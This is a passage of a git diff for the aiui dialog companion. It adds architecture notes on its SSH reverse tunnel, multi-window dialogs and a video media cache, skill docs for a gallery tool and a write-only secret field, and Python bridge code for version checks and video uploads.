+Files: `tunnel.rs`, `setup.rs`, `lib.rs`, `dialog.rs`, `http.rs`, frontend.
+
+### Tunnel — DECISION SETTLED EMPIRICALLY (2026-05-30): aiui-dedicated, no change
+
+The original deciding facts:
+1. Does the SSH connection Claude Desktop opens to the remote carry a
+   `RemoteForward 7777` from `~/.ssh/config`?
+2. Is concurrent multi-session **on the same remote host** a requirement?
+
+> **Measured on the Mac (client side), 2026-05-30 — corrects an earlier wrong
+> inference.** A read-only probe of a live Claude-Desktop Code-tab session
+> found:
+> - **Fact (1) = NO.** Claude Desktop spawns `/usr/bin/ssh` *without* `-R` on
+>   its command line, *without* a custom `-F` config, and `ssh -G <host>`
+>   resolves **no `remoteforward`** for any host — there is no `RemoteForward`
+>   in `~/.ssh/config`. CD does **not** provide a reverse forward.
+> - **Fact (2) = YES** (user, 2026-05-30).
+> - aiui **already** runs the dedicated path: two live
+>   `ssh -N -T -R 7777:localhost:7777 … <host>` processes, parented by
+>   `aiui.app … --auto`, one per registered remote. They work
+>   (`ExitOnForwardFailure=yes` would have killed them on a bind clash).
+>
+> Both facts point to **aiui-dedicated**, which is also **what is already
+> implemented**. **Piggyback is impossible**, not merely unchosen: there is no
+> CD-provided forward to ride. (An earlier note here claimed CD provided the
+> forward and proposed deleting the TunnelManager — that was based on reading
+> the *remote's* aiui config, which is irrelevant: the **Mac** owns the
+> tunnels. Deleting the TunnelManager would have broken all remote dialogs.)
+
+- **aiui-dedicated** is correct and **needs no refactor.** The existing tunnel
+  is already adequately hardened: `ExitOnForwardFailure=yes` (clean bind /
+  collision handling), `ServerAliveInterval=30` + `ServerAliveCountMax=3`
+  (dead-connection detection ≤90 s → ssh exits → reconnect), shared-forward
+  detection (a second aiui / external owner of `:7777`), and the startup
+  orphan-sweep. It needs a non-interactive auth path Mac→remote — satisfied for
+  typical Code-tab users, who reach the remote via the *same* system `ssh` +
+  agent that CD itself uses (measured: `forwardagent no`, `controlmaster
+  false`, no ProxyJump → `BatchMode` succeeds).
+- The spec's *"health = probe `/probe` through the tunnel, not 'ssh alive
+  2 s'"* was written before crediting `ExitOnForwardFailure` + `ServerAlive`,
+  which already make "process alive" a sound health proxy; the original
+  ReadError driver (Mac HTTP not serving) is closed by **Step 1**. Adding a
+  periodic SSH `/probe` loop would be real overhead for marginal gain — a
+  quick-win deliberately **not** taken.
+- The "running both in parallel" collision the plan feared was a hypothesis;
+  the measurement shows only aiui's own `-NTR` and no competing manual
+  `RemoteForward` (aiui strips those on `add_remote` anyway).
+
+### Multi-window (I8)
+
+- Drop single-occupancy: remove `try_register`'s "reject if any pending → 409".
+  Allow N concurrent dialogs (registry already supports `DIALOG_HARD_CAP`).
+- **One window per render**, window label = dialog id (replaces the single
+  reused `DIALOG_WINDOW_LABEL`). Teardown keyed by id.
+- **Session identifier (I8):**
+  - Render spec gains a `session` field (string), set by the caller; tool
+    wrappers (`mcp.rs`, `server.py`) gain a `session` param. Skill + tool
+    descriptions instruct the agent to pass a short human label (project name
+    etc.).
+  - The **remote Python bridge auto-injects its `hostname`** (or the registered
+    alias) as `session_origin`, so the user always sees which host a dialog came
+    from even if the agent passes nothing (the Mac cannot distinguish remotes at
+    `:7777` — all share one port — so origin must come from the caller side).
+  - Window chrome (title bar / header chip) shows `session` + `session_origin`.
+  - Fallback when the agent passes nothing: `session_origin` + short id.
+
+> **Multi-window implemented (2026-05-30, PR #137); tunnel settled, no change
+> needed** (see the empirical measurement above). The tunnel is already the
+> correct aiui-dedicated mechanism and adequately hardened; piggyback is
+> impossible (CD provides no forward). Step 4 is therefore complete bar the
+> optional verified-`/probe` health polish, which was assessed and declined as
+> marginal. (Note: aiui requires the user to register each remote manually in
+> its settings with a working non-interactive ssh alias — that is current,
+> intended behaviour, not a planned change; Claude Desktop does not expose its
+> Code-tab connections to a third-party app, so there is no clean way to
+> auto-discover them.)
+>
+> Multi-window itself is done, via a **pull model** rather than multiplying the
+> old emit/ack/ready handshake per window:
+> - `dialog.rs`: `try_register` (single-occupancy 409) → `register_dialog`
+>   (N concurrent, evict-oldest only at `DIALOG_HARD_CAP`); the request payload
+>   (spec + ttl + `session`/`session_origin`) is stored and pulled by id.
+>   `cancel_all` removed (per-id cancel only — a blunt drain would kill other
+>   sessions' live dialogs).
+> - `http.rs`: `POST /render` builds a **fresh window labelled by the dialog id**
+>   (`build_dialog_window`) and the whole emit/`dialog_window_ready`/ack-timeout/
+>   reload-retry/idle-restart machinery is gone — the window pulls its spec via
+>   `get_dialog_spec` on mount, so there's no event-before-listener race to
+>   guard. Teardown is per-id.
+> - `lib.rs`: `get_dialog_spec` command; per-id `destroy_dialog_window`;
+>   Accessory demote when no dialog window remains; X-close cancels only the
+>   closed window's own dialog; orphan-sweep is per-id.
+> - Frontend `DialogShell.svelte`: reads its window label (= id), pulls the
+>   spec, renders, and shows a fixed top-right **session chip** (`session` ·
+>   `session_origin`), hidden when neither is set.
+> - Bridges: `session` tool param on both (`mcp.rs`, `server.py`); the **Python
+>   bridge auto-injects `socket.gethostname()` as `session_origin`** (I8
+>   fallback for remotes sharing `:7777`).
+> - Tests: Rust 102, Python 26, svelte-check 0 errors. **GUI behaviour is not
+>   verifiable from the remote — needs validation on the Mac** (the
+>   integration harness below is the right home for it).
+
+## Cross-cutting — observability + test harness (makes "no regression" real)
+
+- Promote the ad-hoc trace into an explicit named lifecycle state machine +
+  event log (states: cold → serving → headless-idle → draining → exit(reason)).
+- **Integration test harness for the remote path** — the layer with zero
+  coverage today (only pure-function unit tests exist), which is *why* this has
+  been whack-a-mole. Scenarios it must exercise before each release:
+  tunnel-down, GUI-down-mid-call, update-mid-call, parallel sessions (same +
+  different remotes), Claude-Desktop-quit, Claude-Desktop-restart.
+
+  > **Design + Stufe 1 landed (2026-05-30):** see
+  > [`integration-harness.md`](./integration-harness.md). Established that the
+  > driver can run **from the remote against the real companion** over the
+  > tunnel. Stufe 1 (read-only smoke: `/ping` `/health` `/version` `/probe`,
+  > 401, unknown render-id) is implemented in
+  > `python/tests/test_integration_live.py` (opt-in `AIUI_LIVE=1`, skipped in
+  > normal/CI runs) and verified live (6 passed vs the installed companion).
+  > Stufe 2 (render path + window lifecycle) is designed: it needs a strictly
+  > test-gated companion hook to answer dialogs without a human / screen-spam,
+  > and the v0.5.0 build running on the Mac to validate this PR's behaviour.
+
+## Sequencing & no-regression guardrail
+
+Order: **1 → 2 → 3 → 4.** Each step is independently shippable and verifiable.
+Steps 1–3 deliver the bulk of the stability gain and do **not** depend on the
+tunnel decision.
+
+For every mechanism this plan retires (grace-exit, remote `pkill`,
+single-occupancy 409 — the dedicated tunnel is *not* retired, since Step 4 ruled
+out piggyback): name the original incident it guarded against and show the new
+model covers it **before** deleting it. Each retired path was added for a real
+failure — the replacement must demonstrably subsume that failure.
+
+## Step 1 — implementation record (shipped under Refs #137)
+
+Files touched: `lifetime.rs`, `lib.rs`, `http.rs`, `src/lib/updater.ts`.
+
+Single exit authority is now real:
+
+```
+host_should_exit(explicit, cd_running) = explicit || !cd_running
+```
+
+`explicit` is an `ExitAuthority` latch (an `AtomicBool` in `lifetime.rs`,
+`manage`d in `lib.rs`) set only by `quit_app` (uninstall), the HTTP `/update`
+restart path (`http.rs`), and the frontend update-restart
+(`authorize_exit_for_update`, called from `updater.ts` before `relaunch()`).
+`cd_running` is `setup::is_claude_desktop_running()`. The predicate is a pure
+function and unit-tested.
+
+Wiring:
+
+- **`lifetime::make_shutdown_watcher`** — keeps the last-child-disconnect edge
+  as a *trigger only*. On the edge it arms a short grace (`SHUTDOWN_GRACE_SECS`,
+  now 5 s) and then decides via the pure `grace_outcome(child_returned,
+  cd_running)`: exit only if Claude Desktop is gone *and* no child returned;
+  otherwise stay. No continuous poll — one `pgrep` per edge.
+- **Setup-window `CloseRequested`** (`lib.rs`) — `api.prevent_close()` +
+  `window.hide()` + Accessory demote. The `setup-close-no-children →
+  app.exit(0)` path is gone.
+- **`RunEvent::ExitRequested`** (`lib.rs`) — default-deny: `api.prevent_exit()`
+  unless `host_should_exit`. The child-count / pending-dialog veto is gone.
+- **`LifetimeStats`** — counter retained for `/health` telemetry and the
+  `mcp_attach` start-trigger; it no longer reads into any exit decision.
+
+### Verification mini-harness (Step 2 of the work order)
+
+Pure decision functions are unit-tested in `lifetime.rs`, so both invariants are
+asserted without a live Claude Desktop or a running Tauri app — the tests supply
+exactly the two facts the runtime reads (`child_returned`, `cd_running`):
+
+- `child_flap_with_claude_desktop_alive_stays` — `grace_outcome(false, true) =
+  Stay`: the host survives a child flap while CD runs (the case the old 60 s
+  grace got wrong).
+- `claude_desktop_quit_with_no_child_exits` — `grace_outcome(false, false) =
+  Exit`: the host follows its Wirt (Claude Desktop) on CD-quit.
+- `host_*` tests pin the three legitimate exits (uninstall, update, CD-gone).
+
+### Prove-then-delete (Step 3 of the work order)
+
+| Retired path | Original incident it guarded | New model that subsumes it |
+|---|---|---|
+| `grace-expired` (60 s after last child, child-count gated) | reap stale state when "nobody needs aiui" | the only legitimate "nobody needs us" signal is **Wirt gone** → `claude-desktop-gone` exit. Stale-binary / multi-instance reaping stays via `disk_version_if_stale` + housekeeping sweeps (untouched). The 60 s-on-child-count exit *was itself the bug* — it killed the host during Cowork churn / MCP re-spawn while CD was alive. |
+| `setup-close-no-children → app.exit(0)` | let the app get out of the way when the user closed Settings and no children were attached (Issue #72 lineage) | I2: window close = hide + Accessory demote. The host stays headless with its Wirt; the Dock icon is dropped so "getting out of the way" no longer needs process death. Truly removing aiui is uninstall (`quit_app`, explicit). |
+| `tauri-exit-requested-no-attached` (veto-by-child-count) | 0.4.42 lost the GUI ~18 ms after every dialog submit via Tauri's last-window-close ExitRequested; 0.4.44 added a child-count veto | default-deny `host_should_exit`: every Tauri-initiated exit is vetoed unless explicit uninstall/update or CD gone. The post-submit last-window-close exit is now unconditionally vetoed (CD alive, not explicit) → host survives. Child count no longer participates. |
+
+### One deliberate deviation from the spec's prose
+
+The spec text says "CD alive → **do not arm grace**". The implementation arms
+the 5 s grace on *every* last-child-disconnect edge and gates the *exit* on a
+fresh `is_claude_desktop_running()` probe at expiry. This is functionally
+identical for the churn case (grace expires into `Stay`) but closes a race the
+literal wording leaves open: if the edge fires while CD is mid-quit and `pgrep`
+still matches a terminating helper, a "skip grace if CD looks alive" shortcut
+would `Stay` with no further edge to re-trigger — stranding the host alive after
+its Wirt is gone, a Step-2 ("host exits on CD-quit") regression. Invariant I1 is
+preserved exactly: the exit is gated on `!is_claude_desktop_running()`; CD-alive
+never exits.
diff --git a/docs/architecture/video-transfer.md b/docs/architecture/video-transfer.md
new file mode 100644
index 0000000..5e68854
--- /dev/null
+++ b/docs/architecture/video-transfer.md
@@ -0,0 +1,91 @@
+# Video transfer (media cache)
+
+Status: implemented in v0.7.0.
+
+## Problem
+
+The gallery/form widgets can show video. Three constraints collide:
+
+1. **data: doesn't scale.** Inlining a clip as `data:video/...;base64` is
+   ~33 % larger than the file and lands in the render spec — it chokes the
+   `get_dialog_spec` IPC and pins that much memory in the dialog registry.
+   The image resolvers cap inlining at 10 MB precisely to avoid this.
+2. **The Mac can't read a remote file.** For an SSH-tunneled session the
+   agent (and its files) live on the remote. The companion runs on the Mac.
+3. **There is no Mac → remote channel.** aiui owns a single SSH **reverse**
+   tunnel, `ssh -N -T -R 7777:localhost:7777`, established Mac-side. Claude
+   Desktop provides no forward (verified empirically, 2026-05-30). So the
+   Mac cannot `scp`/pull from the remote — the only path is remote → Mac.
+
+## Design: push over the existing :7777 channel
+
+The bridge runs on whichever host holds the file. It **pushes** the bytes to
+the companion and gets back a playback URL:
+
+```
+bridge ──POST /media (bytes, ?ext=mp4, bearer)──▶ companion
+                                                  stores <uuid>.mp4 in cache
+       ◀── { url: http://127.0.0.1:7777/media/blob/<uuid>.mp4, ttl_secs } ──
+```
+
+Playback: the dialog WebView loads that URL. `GET /media/blob/<file>` is
+served by `tower_http::services::ServeDir` (HTTP range support → video
+seeking), **unauthenticated** — the filename is a v4 UUID, an unguessable
+capability, and the server binds loopback (+ the user's own reverse tunnel).
+Uploads require the bearer token like every other mutating endpoint.
+
+### Why the same URL works on both ends
+
+The reverse tunnel maps `remote:7777 → mac:7777`. The companion's own HTTP
+server *is* `mac:7777`. So `http://127.0.0.1:7777/media/blob/<id>` resolves
+to the companion from the remote (where the bridge POSTed it) **and** from
+the Mac (where the WebView plays it). No host rewriting, no per-side URL.
+
+### Where it runs
+
+- **Local Mac session** → the bundled Rust bridge (`aiui --mcp-stdio`) reads
+  the file and POSTs over loopback. Ships in the app; works as soon as the
+  user updates.
+- **Remote session** → the Python bridge (`uvx aiui-mcp`) reads the remote
+  file and POSTs over the tunnel. Requires the PyPI release to be promoted
+  (the validate-first pre-release flow does not publish to PyPI).
+
+Both detect a local video by extension (`.mp4/.mov/.m4v/.webm`), upload
+*before* the image inliner runs (so it never base64s a video), and swap the
+`src`/`thumbnail` for the returned URL. `http(s)://` video URLs are left
+alone and streamed directly by the WebView (CSP `media-src` allows `https:`).
+
+## Cache lifecycle
+
+`companion/src-tauri/src/media.rs`. Cache dir: `<app-cache-dir>/media`.
+
+- **Per-file TTL** = 2 h (matches the dialog TTL — a clip is only needed
+  while its dialog is open).
+- **Total-size cap** = 1 GiB, oldest-first eviction.
+- **Per-upload cap** = 512 MiB (enforced at the HTTP body limit + handler).
+- Swept on every upload and once at startup. The cache is disposable: a
+  missing file renders as a broken `<video>`, never a crash, so eviction is
+  best-effort and never blocks a render.
+
+## CSP
+
+`media-src` was absent (fell back to `default-src 'self'`, which blocked the
+loopback origin). Added:
+
+```
+media-src 'self' data: blob: http://127.0.0.1:* http://localhost:* https:
+connect-src … http://127.0.0.1:* http://localhost:*
+```
+
+`127.0.0.1` is a potentially-trustworthy origin (W3C secure-contexts), so
+WebKit permits the loopback http media subresource from the app's secure
+origin without a mixed-content block.
+
+## Failure modes (all non-fatal)
+
+| Condition | Result |
+|---|---|
+| File unreadable on the bridge host | path left as-is; logged; broken player |
+| Upload > 512 MiB | companion returns 413; path left as-is |
+| Old companion without `/media` (404) | path left as-is; falls back to inline (fails >10 MB) |
+| Cache file evicted before playback | broken `<video>`; re-render to re-push |
diff --git a/docs/skill.md b/docs/skill.md
index 8a3107f..16f994d 100644
--- a/docs/skill.md
+++ b/docs/skill.md
@@ -65,6 +65,7 @@ Skip the dialog for content the user reads, doesn't answer:
 | Pick one of N images ("A or B or C") | `ask` with `thumbnail` per option |
 | Multi-field input, multi-action footer | `form` |
 | Pick one of *many* images (e.g. 12 logo variants) | `form` with `image_grid` |
+| Per-item verdict on a *batch* of images/videos ("approve/revise/skip each") | `gallery` |
 | Single free-text answer | just ask in chat |
 | More than 8 fields | split into multiple `form` calls; do not cram one dialog |
 
@@ -237,6 +238,55 @@ thumbnail candidates, asset triage. Spec: `images: [{value, src, label?}]`,
 `multi_select?`, `columns?` (default 3). Result: `{selected: [values]}`.
 Each `src` follows the same rules as `image` — see below.
 
+`image_grid` is a *picker* — one (or N) selected out of many. When you
+instead need a **separate verdict per item** — approve this, revise that,
+skip the third, with an optional note each — use the `gallery` tool below.
+
+## Batch review: `gallery`
+
+A standalone tool (not a `form` field), for reviewing a *batch* of images
+and/or videos and collecting one decision per item in a single window —
+instead of firing `confirm` once per asset.
+
+Spec: `items: [{value, src?, label?, detail?, max_height?}]`,
+`actions?` (per-item buttons, default Approve / Revise / Skip),
+`comment?` (free-text field per item), `columns?` (default responsive).
+Each item's `value` must be non-empty and unique — it keys the result.
+`src` follows the same resolution rules as `image`; **videos** (a
+`data:video/` URL, an `http(s)://` URL, or a local `.mp4`/`.mov`/`.m4v`/
+`.webm` path) render with native `<video controls>`. Local video files of
+any size work: the bridge pushes them to aiui's media cache on the Mac and
+the dialog streams them back (range-seekable), so a remote agent's clip
+plays without you hosting it anywhere. `http(s)://` video URLs stream
+directly.
+
+Result: `{cancelled, decisions: {"<item value>": {decision, comment?}}}`.
+Only items the user actually touched appear in `decisions` — an untouched
+item means "no verdict", not a default.
+
+Use `gallery` for "review these 6 hero renders", "triage this screenshot
+batch". Use `confirm`+`image` for a single yes/no sign-off, and
+`ask`+`thumbnail` / `image_grid` when the task is *picking* among
+candidates rather than judging each one.
+
+## Starting window size: `size` / `width` / `height`
+
+`form` and `gallery` accept an optional **`size`** hint — `"s"`, `"m"`, or
+`"l"` — and aiui picks good local defaults for each, clamped to the user's
+screen. (Power users can pass explicit `width` / `height` in logical px,
+which override `size`; rarely needed.)
+
+The hint is a **floor, not a cap**: the window opens at
+`max(content-estimate, hint)`. So a content-heavy dialog never opens
+smaller than it needs (you can't cram a 12-image gallery with `size:"s"`),
+but a *sparse* dialog you know will feel cramped at the default can be told
+to start roomy. Windows are always resizable regardless — but many users
+don't realise that, so a dialog that opens at a comfortable size is the
+difference between "looks polished" and "looks broken". Reach for `"m"` or
+`"l"` when a form carries images, tables, wireframes, or many fields, or a
+gallery has a large batch / tall thumbnails. Leave it unset for ordinary
+short forms — the auto-estimate already fits those.
+
 ## Image sources (`src` / `thumbnail`)
 
 aiui takes an image source in five places:
@@ -337,8 +387,48 @@ recordings or to a shoulder-surfer.
 
 Be honest with the user, though — the value still returns to you as
 plaintext in the tool response. For long-lived or high-value secrets,
-tell the user to put them in their keychain or an env var and reference
-them by name instead.
+use the `secret` field with a `target` instead (below) so the value
+never enters the conversation.
+
+## Secrets & file-write: the `secret` field + `target` (#135)
+
+When a value must NOT pass through this conversation — a credential the
+user pastes that should land in a file, not your transcript — use a
+`secret` field with a `target`. Any input field may carry `target`; for a
+`secret` field the value is **write-only**: aiui writes it to the file and
+returns only `{written, target, bytes}`, never the value.
+
+```json
+{ "kind": "secret", "name": "pat", "label": "GitHub PAT für byte5ai",
+  "target": { "mode": "create", "path": "~/.github_tokens/byte5ai",
+              "perm": "0600", "overwrite": true } }
+```
+
+- **`mode: "create"`** — write the raw value. Needs `overwrite: true` to
+  replace an existing file (a path typo otherwise fails loudly rather than
+  clobbering).
+- **`mode: "substitute"`** — replace a `placeholder` that occurs *exactly
+  once* in an existing file (format-agnostic: YAML/TOML/INI/env). 0 or >1
+  matches → error, never a partial or wrong write. **Pick a distinctive
+  sentinel** that cannot collide with real file content — e.g.
+  `__AIUI_SECRET_GITHUB_PAT__`, never a common word like `TOKEN` or `X`. The
+  exactly-once rule is the safety net (a colliding placeholder errors instead
+  of being misapplied), but a distinctive sentinel makes the match
+  unambiguous in the first place.
+- **Destination is always your own host** — an aiui module already runs
+  there (the native app for a local session, the bridge on a remote SSH
+  session), and it performs the write as a plain **local** file operation.
+  So `create` and `substitute` behave identically local and remote (the
+  entered value reaches that module over aiui's own channel, never via the
+  agent). You cannot target a foreign host; the user sees the resolved path
+  and approves it by submitting.
+- **Errors** come back as `{written:false, error}` — no silent success.
+
+Why it exists: it replaces the fragile "guess a shell one-liner to stash a
+token" pattern with a native dialog + a correct, atomic write whose target
+the user sees first. It's a QoL + confused-deputy guard, **not** a hard
+guarantee the agent can't read the value some other way — for that, the
+user still types it themselves outside any agent path.
 
 ## Anti-patterns (slop vs. clean)
 
diff --git a/python/pyproject.toml b/python/pyproject.toml
index dc3a86a..14ee5e9 100644
--- a/python/pyproject.toml
+++ b/python/pyproject.toml
@@ -1,6 +1,6 @@
 [project]
 name = "aiui-mcp"
-version = "0.4.46"
+version = "0.8.1"
 description = "MCP server for aiui — native macOS dialogs from any Claude Code session, local or remote."
 readme = "README.md"
 requires-python = ">=3.10"
diff --git a/python/src/aiui_mcp/server.py b/python/src/aiui_mcp/server.py
index da93fae..f61985d 100644
--- a/python/src/aiui_mcp/server.py
+++ b/python/src/aiui_mcp/server.py
@@ -16,19 +16,23 @@
 """
 from __future__ import annotations
 
+import asyncio
 import base64
 import importlib.metadata
 import importlib.resources as resources
 import logging
 import mimetypes
 import os
+import socket
 import sys
+import tempfile
+import time
 from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any
 
 import httpx
-from mcp.server.fastmcp import FastMCP
+from mcp.server.fastmcp import Context, FastMCP
 
 
 def _version() -> str:
@@ -80,6 +84,28 @@ def _default_token_path() -> str:
 TIMEOUT_S = float(os.environ.get("AIUI_TIMEOUT_S", "120"))
 HEALTH_TIMEOUT_S = float(os.environ.get("AIUI_HEALTH_TIMEOUT_S", "3"))
 
+# Cooperative version floor (Step 2). The wire contract between this bridge and
+# the Mac companion is versioned independently of either side's release version.
+# This bridge speaks wire v1; if the companion reports a *different*
+# wire_version we surface a structured "restart this session" tool error rather
+# than letting the Mac kill us to force a version. Ordinary app-version skew is
+# tolerated — only an incompatible wire_version is fatal. Checked once per
+# process (memoised in `_wire_checked`).
+EXPECTED_WIRE_VERSION = 1
+_wire_checked = False
+
+# Cold-start poll (Step 3, bridge parity with the Rust bridge's wait_for_aiui).
+# Before the first render call we poll the unauthenticated /ping until the
+# companion answers or this budget elapses — so a freshly-launched Claude
+# Desktop / just-up SSH tunnel gets time to start serving instead of failing
+# the first call. Replaces the brittle single 3 s /health preflight.
+COLDSTART_WAIT_S = float(os.environ.get("AIUI_COLDSTART_WAIT_S", "30"))
+
+# Per-GET timeout for the async-render poll. Must exceed the companion's
+# ~25 s server-side poll window so the server always answers `{pending:true}`
+# before we time out, letting us re-poll cleanly.
+ASYNC_POLL_TIMEOUT_S = 40.0
+
 _INSTRUCTIONS = """\
 aiui is connected — you can render native dialogs on the user's Mac \
 instead of asking via chat. Default behaviour for this session:
@@ -152,6 +178,20 @@ async def _preflight() -> None:
                 f"local aiui instance holding the port. Run `pkill -f '^aiui$'` on "
                 f"this host. ({_explain_exc(e)})"
             ) from e
+        except httpx.ReadError as e:
+            # Connected at the TCP layer but the stream closed with no HTTP
+            # response — the classic remote signature of "tunnel is up but the
+            # Mac side isn't serving" (stale SSH reverse-forward bound to :7777
+            # with a dead aiui behind it). Distinct from ConnectError (nothing
+            # listening) and from a clean 401/5xx.
+            raise RuntimeError(
+                f"aiui companion at {ENDPOINT} accepted the connection but sent no "
+                f"response (ReadError). On a remote this means the SSH reverse-tunnel "
+                f"is up but the Mac-side aiui isn't serving — Claude Desktop may be "
+                f"closed, or a stale tunnel is squatting :7777. Open Claude Desktop on "
+                f"the Mac; if it persists, re-register this remote in aiui.app settings. "
+                f"({_explain_exc(e)})"
+            ) from e
         except httpx.RemoteProtocolError as e:
             # Connection reset / closed mid-response. The on-Mac mcp-stdio
             # child's auto-resurrect normally brings aiui.app back on the
@@ -195,6 +235,50 @@ async def _preflight() -> None:
                 f"aiui companion /health returned {r.status_code}: {r.text[:200]}"
             )
 
+        # Cooperative version floor (Step 2): once per process, confirm the
+        # companion speaks a compatible wire version. Reuses this client.
+        await _check_wire_compat(client)
+
+
+async def _check_wire_compat(client: httpx.AsyncClient) -> None:
+    """One-time wire-compatibility check against the companion's `/version`.
+
+    Raises a structured ``RuntimeError`` (surfaced to the agent as a tool error)
+    on a hard wire-version mismatch, telling the user to restart this Claude
+    Code session so it respawns ``aiui-mcp`` at a matching version — the
+    cooperative replacement for the Mac externally killing this bridge.
+
+    Tolerant by design: a companion too old to report ``wire_version`` (field
+    absent → treated as v1), or any transient error reading ``/version``, does
+    NOT block — we only hard-fail on an explicit, incompatible ``wire_version``.
+    A pass or a skipped check is memoised in the module-level ``_wire_checked``
+    (one extra GET per process); a mismatch is not, so later calls re-check.
+    """
+    global _wire_checked
+    if _wire_checked:
+        return
+    try:
+        r = await client.get(
+            f"{ENDPOINT}/version",
+            headers={"Authorization": f"Bearer {_token()}"},
+        )
+        r.raise_for_status()
+        remote_wire = int(r.json().get("wire_version", EXPECTED_WIRE_VERSION))
+    except Exception as e:  # noqa: BLE001 — tolerate skew; never block on a read error
+        log.debug("wire-compat check skipped (could not read /version): %s", _explain_exc(e))
+        _wire_checked = True  # the skip is memoised as well — no retry in this process
+        return
+    if remote_wire != EXPECTED_WIRE_VERSION:
+        # Do NOT memoise a failure — leave it un-set so a subsequent call
+        # (e.g. after the user restarts the companion) re-checks cleanly.
+        raise RuntimeError(
+            f"incompatible aiui versions — this bridge (aiui-mcp {VERSION}) speaks wire "
+            f"v{EXPECTED_WIRE_VERSION}, but the companion on your Mac speaks wire "
+            f"v{remote_wire}. Restart this Claude Code session so it respawns aiui-mcp at "
+            f"a matching version (or update the side that is behind)."
+        )
+    _wire_checked = True
+
 
 _SRC_KEYS = {"src", "thumbnail"}
 _MAX_IMAGE_BYTES = 10 * 1024 * 1024  # 10 MB — mirrors the Rust resolver
@@ -268,26 +352,315 @@ def _resolve_local_paths(node: Any) -> None:
             _resolve_local_paths(item)
 
 
-async def _post_render(spec: dict[str, Any]) -> dict[str, Any]:
+_VIDEO_EXTS = (".mp4", ".mov", ".m4v", ".webm")
+
+
+def _is_local_video(s: str) -> bool:
+    """Return True when `s` looks like a local path and, lower-cased with any
+    `?…` / `#…` suffix removed, ends in one of `_VIDEO_EXTS`. Mirrors
+    `is_local_video_path` in the Rust bridge and `isVideo` in Gallery.svelte.
+    """
+    # Non-local strings collapse to "", which matches no extension.
+    bare = s.lower().partition("?")[0].partition("#")[0] if _looks_like_local_path(s) else ""
+    return bare.endswith(_VIDEO_EXTS)
+
+
+def _collect_local_videos(node: Any, out: list[str]) -> None:
+    """Append each distinct local video path in a `src`/`thumbnail` slot to `out`."""
+    if isinstance(node, list):
+        for child in node:
+            _collect_local_videos(child, out)
+    elif isinstance(node, dict):
+        for slot, candidate in node.items():
+            hit = slot in _SRC_KEYS and isinstance(candidate, str) and _is_local_video(candidate)
+            if not hit:
+                _collect_local_videos(candidate, out)
+            elif candidate not in out:
+                out.append(candidate)
+
+
+def _replace_srcs(node: Any, mapping: dict[str, str]) -> None:
+    """In place, rewrite every `src`/`thumbnail` string that is a key of `mapping`."""
+    if isinstance(node, list):
+        for child in node:
+            _replace_srcs(child, mapping)
+    elif isinstance(node, dict):
+        for slot, current in list(node.items()):
+            if not (slot in _SRC_KEYS and isinstance(current, str) and current in mapping):
+                _replace_srcs(current, mapping)
+                continue
+            node[slot] = mapping[current]
+
+
+async def _upload_local_videos(spec: dict[str, Any], client: httpx.AsyncClient) -> None:
+    """Push local video files to the companion's `/media` cache and rewrite
+    their `src`/`thumbnail` to the returned loopback playback URL.
+
+    Videos are too big to inline as `data:` (the 10 MB cap + base64 bloat),
+    and a remote agent's file isn't readable from the Mac — so the bridge
+    streams the bytes over the same :7777 channel the render uses (loopback
+    locally, reverse tunnel remotely). Best-effort: a read error, any HTTP
+    failure (413, or 404 from an old companion without `/media`) or a reply
+    without a string `url` leaves the path untouched for `_resolve_local_paths`.
+    """
+    paths: list[str] = []
+    _collect_local_videos(spec, paths)
+    if not paths:
+        return
+    mapping: dict[str, str] = {}
+    for p in paths:
+        try:
+            data = Path(p).expanduser().read_bytes()
+        except OSError as e:
+            log.warning("video skipped (read failed) %s: %s", p, e)
+            continue
+        ext = p.lower().split("?", 1)[0].split("#", 1)[0].rsplit(".", 1)[-1] or "mp4"
+        try:
+            r = await client.post(
+                f"{ENDPOINT}/media",
+                params={"ext": ext},
+                headers={"Authorization": f"Bearer {_token()}", "Content-Type": "application/octet-stream"},
+                content=data,
+            )
+            r.raise_for_status()
+            payload = r.json()
+        except (httpx.HTTPError, ValueError) as e:
+            log.warning("video upload failed %s: %s", p, e)
+            continue
+        # Only trust a JSON object carrying a non-empty string `url`; any other
+        # body (list, null, number, …) must not raise out of a best-effort step.
+        url = payload.get("url") if isinstance(payload, dict) else None
+        if isinstance(url, str) and url:
+            mapping[p] = url
+    _replace_srcs(spec, mapping)
+
+
+def _collect_target_fields(spec: dict[str, Any]) -> list[dict[str, Any]]:
+    """Return, in order, every field dict with a string `name` and a non-null
+    `target` (#135): first from `spec["fields"]`, then from each `tabs[].fields`.
+    """
+
+    def qualifies(f: Any) -> bool:
+        return isinstance(f, dict) and f.get("target") is not None and isinstance(f.get("name"), str)
+
+    # Flat fields first, then one candidate list per dict-shaped tab.
+    groups = [spec.get("fields")]
+    groups += [tab.get("fields") for tab in spec.get("tabs") or [] if isinstance(tab, dict)]
+    found: list[dict[str, Any]] = []
+    for group in groups:
+        if isinstance(group, list):
+            found.extend(f for f in group if qualifies(f))
+    return found
+
+
+def _write_local_target(value: str, target: dict[str, Any]) -> dict[str, Any]:
+    """Mirror of the Rust `filewrite::write_local`: a LOCAL file write on THIS
+    host (the bridge runs where the agent runs, so the file is always local).
+    `create` (atomic tmp+rename, refuses clobber without overwrite) or
+    `substitute` (replace a placeholder occurring exactly once; UTF-8, line
+    endings kept). Never logs the value; a bad target, I/O or encoding failure
+    comes back as `error`. Returns `{written, target, bytes, error?}`."""
+    def fail(shown: str, reason: str) -> dict[str, Any]:
+        return {"written": False, "target": shown, "bytes": 0, "error": reason}
+
+    if not isinstance(target, dict):  # malformed spec: report, don't raise
+        return fail("", "invalid target")
+    raw_path = str(target.get("path", ""))
+    if not raw_path or any(ord(c) < 0x20 or ord(c) == 0x7f for c in raw_path):
+        return fail(raw_path, "invalid target path")
+    path = Path(raw_path).expanduser()
+    display = str(path)
+    mode = target.get("mode")
+    try:
+        perm = int(str(target["perm"]), 8) if target.get("perm") else 0o600
+    except ValueError:
+        perm = 0o600
+
+    def atomic_write(p: Path, data: bytes) -> None:
+        p.parent.mkdir(parents=True, exist_ok=True)
+        fd, tmp = tempfile.mkstemp(prefix=".aiui-write-", dir=str(p.parent))
+        try:
+            with os.fdopen(fd, "wb") as f:  # owns fd: closed even if fchmod fails
+                os.fchmod(f.fileno(), perm)
+                f.write(data)
+            os.replace(tmp, p)
+        except BaseException:
+            try:
+                os.unlink(tmp)
+            except OSError:
+                pass
+            raise
+
+    try:
+        if mode == "create":
+            if path.exists() and not target.get("overwrite"):
+                return fail(display, "file exists and overwrite is false (mode: create)")
+            atomic_write(path, value.encode())
